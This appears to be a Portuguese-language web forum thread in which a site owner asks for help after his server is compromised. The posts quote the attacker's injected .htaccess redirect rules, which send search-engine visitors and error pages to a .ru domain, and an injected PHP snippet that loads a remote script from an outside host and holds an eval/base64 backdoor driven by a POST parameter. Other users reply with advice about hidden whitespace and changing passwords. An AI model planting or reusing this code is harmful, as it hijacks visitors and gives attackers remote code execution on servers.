Ir para conteúdo

POWERED BY:

Arquivado

Este tópico foi arquivado e está fechado para novas respostas.

phfmiranda

Servidor sendo atacado

Por , em Docker, Kubernets e outros ambientes

Recommended Posts

phfmiranda    0

phfmiranda
Postado

Bom dia Pessoal,

 

Meu servidor está sendo atacado direto, em todos os sites o atacante modifiou o .htacess e inseriu o seguinte código:

 

																																																							
																					ErrorDocument 400 http://lensesorganization.ru/contact/index.php																														

																													ErrorDocument 401 http://lensesorganization.ru/contact/index.php																														

																													ErrorDocument 403 http://lensesorganization.ru/contact/index.php																														

																													ErrorDocument 404 http://lensesorganization.ru/contact/index.php																														

																													ErrorDocument 500 http://lensesorganization.ru/contact/index.php																														

																													<IfModule mod_rewrite.c>																														

																													RewriteEngine On																														

																													RewriteCond %{HTTP_REFERER} .*google.* [OR]																														

																													RewriteCond %{HTTP_REFERER} .*ask.* [OR]																														

																													RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]																														

																													RewriteCond %{HTTP_REFERER} .*baidu.* [OR]																														

																													RewriteCond %{HTTP_REFERER} .*youtube.* [OR]																														

																													RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]																														

																													RewriteCond %{HTTP_REFERER} .*qq.* [OR]																														

																													RewriteCond %{HTTP_REFERER} .*excite.* [OR]																														

																													RewriteCond %{HTTP_REFERER} .*altavista.* [OR]																														

																													RewriteCond %{HTTP_REFERER} .*msn.* [OR]																														

																													RewriteCond %{HTTP_REFERER} .*netscape.* [OR]																														

																													RewriteCond %{HTTP_REFERER} .*aol.* [OR]																														

																													RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]																														

																													RewriteCond %{HTTP_REFERER} .*goto.* [OR]																														

																													RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]																														

																													RewriteCond %{HTTP_REFERER} .*mamma.* [OR]																														

																													RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]																														

																													RewriteCond %{HTTP_REFERER} .*lycos.* [OR]																														

																													RewriteCond %{HTTP_REFERER} .*search.* [OR]																														

																													RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]																														

																													RewriteCond %{HTTP_REFERER} .*bing.* [OR]																														

																													RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]																														

																													RewriteCond %{HTTP_REFERER} .*facebook.* [OR]																														

																													RewriteCond %{HTTP_REFERER} .*twitter.* [OR]																														

																													RewriteCond %{HTTP_REFERER} .*blog.* [OR]																														

																													RewriteCond %{HTTP_REFERER} .*live.* [OR]																														

																													RewriteCond %{HTTP_REFERER} .*myspace.* [OR]																														

																													RewriteCond %{HTTP_REFERER} .*mail.* [OR]																														

																													RewriteCond %{HTTP_REFERER} .*yandex.* [OR]																														

																													RewriteCond %{HTTP_REFERER} .*rambler.* [OR]																														

																													RewriteCond %{HTTP_REFERER} .*ya.* [OR]																														

																													RewriteCond %{HTTP_REFERER} .*aport.* [OR]																														

																													RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]																													
																											RewriteCond %{HTTP_REFERER} .*flickr.*																																																							RewriteRule ^(.*)$ http://lensesorganization.ru/contact/index.php [R=301,L]																														
																											</IfModule>

 

 

Como posso resolver este problema.

 

Obrigado.

Compartilhar este post

Link para o post
Compartilhar em outros sites

hinom    5

hinom
Postado

role a página na horizontal para ver a "arte"

foi colocado espaços para enganar visualmente..

 

é complicado dizer como foi invadido, pois envolve vários motivos.

comece trocando senhas administrativas (ftp, cpanel, etc..)

Compartilhar este post

Link para o post
Compartilhar em outros sites

phfmiranda    0

phfmiranda
Postado

Bom dia Pessoal,

 

Encontrei o seguinte código nas páginas do site:

 

global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }

 

Alterei todas as senhas do ftp, cpanel e e-mail.

Compartilhar este post

Link para o post
Compartilhar em outros sites

hinom    5

hinom
Postado

mesmo alterando todas as senhas o problema persiste?

 

se for o caso, pode ser que tenha vírus no seu Pc e toda vez que utiliza algum cliente ftp, esse virus pode estar capturando os dados e enviando automaticamente..

 

mas pode ser outras coisas.. isso é muito amplo.. você tem que pensar nas possibilidades, onde está falhando em segurança, fazer testes, etc..

Compartilhar este post

Link para o post
Compartilhar em outros sites

phfmiranda    0

phfmiranda
Postado

Bom dia,

 

Fiz a alteração das senhas e até o momento não voltou os scripts com erro, porem verifiquei nos pcs que utilizo e estão limpos.

 

Valeu pela ajuda.

Compartilhar este post

Link para o post
Compartilhar em outros sites
Ir para a lista de tópicos Docker, Kubernets e outros ambientes
×

Informação importante

Ao usar o fórum, você concorda com nossos Termos e condições.

  Aceito